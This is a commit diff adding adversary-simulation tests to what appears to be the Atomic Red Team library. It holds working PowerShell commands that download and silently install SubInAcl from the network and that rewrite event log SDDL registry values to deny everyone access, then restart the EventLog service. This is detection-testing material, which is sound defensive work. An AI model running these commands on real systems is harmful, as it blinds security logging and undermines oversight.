SDDL Tampering Atomics (#3006)

Co-authored-by: Carrie Roberts <[email protected]>
redcanaryco · Dec 11, 2024 · c800c57 · c800c57
1 parent 24d1919
commit c800c57
Show file tree

Hide file tree

Showing 2 changed files with 81 additions and 0 deletions.
diff --git a/atomics/T1222.001/T1222.001.yaml b/atomics/T1222.001/T1222.001.yaml
@@ -140,3 +140,27 @@ atomic_tests:
       icacls '#{path}' /restore #{file_path} /q >nul 2>&1
     name: command_prompt
     elevation_required: true
+- name: SubInAcl Execution
+  description: |-
+    This test simulates an adversary executing the Windows Resource kit utility SubInAcl. This utility was abused by adversaries in the past in order to modify access permissions. Upon execution, a process creation log should be generated indicating successful execution.
+  supported_platforms:
+    - windows
+  input_arguments:
+    SubInAclDownloadPath:
+      type: string
+      default: https://web.archive.org/web/20120528222424if_/http://download.microsoft.com/download/1/7/d/17d82b72-bc6a-4dc8-bfaa-98b37b22b367/subinacl.msi
+      description: Download URL for SubInAcl
+  dependency_executor_name: powershell
+  dependencies:
+    - description: |
+        Download subinacl
+      prereq_command: |
+        if (Test-Path "Test-Path C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe") {exit 0} else {exit 1}
+      get_prereq_command: |-
+        New-Item -Path C:\Users\Public\SubInAcl -ItemType Directory | Out-Null
+        Invoke-WebRequest #{SubInAclDownloadPath} -OutFile C:\Users\Public\SubInAcl\SubInAcl.msi
+        msiexec.exe /i "C:\Users\Public\SubInAcl\SubInAcl.msi" /qn
+  executor:
+    command: '"C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe"'
+    name: command_prompt
+    elevation_required: true
diff --git a/atomics/T1562.002/T1562.002.yaml b/atomics/T1562.002/T1562.002.yaml
@@ -145,3 +145,60 @@ atomic_tests:
     cleanup_command: |
       echo "Sorry you have to reboot"
     name: command_prompt
+- name: Modify Event Log Channel Access Permissions via Registry - PowerShell
+  description: |-
+    This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
+    Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+  supported_platforms:
+    - windows
+  input_arguments:
+    ChannelPath:
+      type: string
+      default: HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-TaskScheduler/Operational
+      description: Path to the event log service channel to alter
+  executor:
+    command: |-
+      Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
+      Restart-Service -Name EventLog -Force -ErrorAction Ignore 
+    cleanup_command: |-
+      Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(A;;0x2;;;S-1-15-3-1024-3153509613-960666767-3724611135-2725662640-12138253-543910227-1950414635-4190290187)(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x7;;;SO)(A;;0x3;;;IU)(A;;0x3;;;SU)(A;;0x3;;;S-1-5-3)(A;;0x3;;;S-1-5-33)(A;;0x1;;;S-1-5-32-573)"
+      Restart-Service -Name EventLog -Force -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
+- name: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell
+  description: |-
+    This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
+    Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+  supported_platforms:
+    - windows
+  input_arguments:
+    ChannelPath:
+      type: string
+      default: HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\Setup
+      description: Path to the event log service channel to alter
+  executor:
+    command: |-
+      New-Item -Path #{ChannelPath} -Force
+      Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
+      Restart-Service -Name EventLog -Force -ErrorAction Ignore
+    cleanup_command: |-
+      Remove-Item -Path #{ChannelPath} -Force
+      Restart-Service -Name EventLog -Force -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
+- name: Modify Event Log Access Permissions via Registry - PowerShell
+  description: |-
+    This test simulates an adversary modifying access permissions for a Windows Event Log channel by setting the "CustomSD" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
+    Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+  supported_platforms:
+    - windows
+  input_arguments:
+    CustomSDPath:
+      type: string
+      default: HKLM:\SYSTEM\CurrentControlSet\Services\EventLog\System
+      description: Path to the event log service channel to alter
+  executor:
+    command: 'Set-ItemProperty -Path #{CustomSDPath} -Name "CustomSD" -Value "O:SYG:SYD:(D;;0x1;;;WD)"'
+    cleanup_command: 'Remove-ItemProperty -Path #{CustomSDPath} -Name "CustomSD"'
+    name: powershell
+    elevation_required: true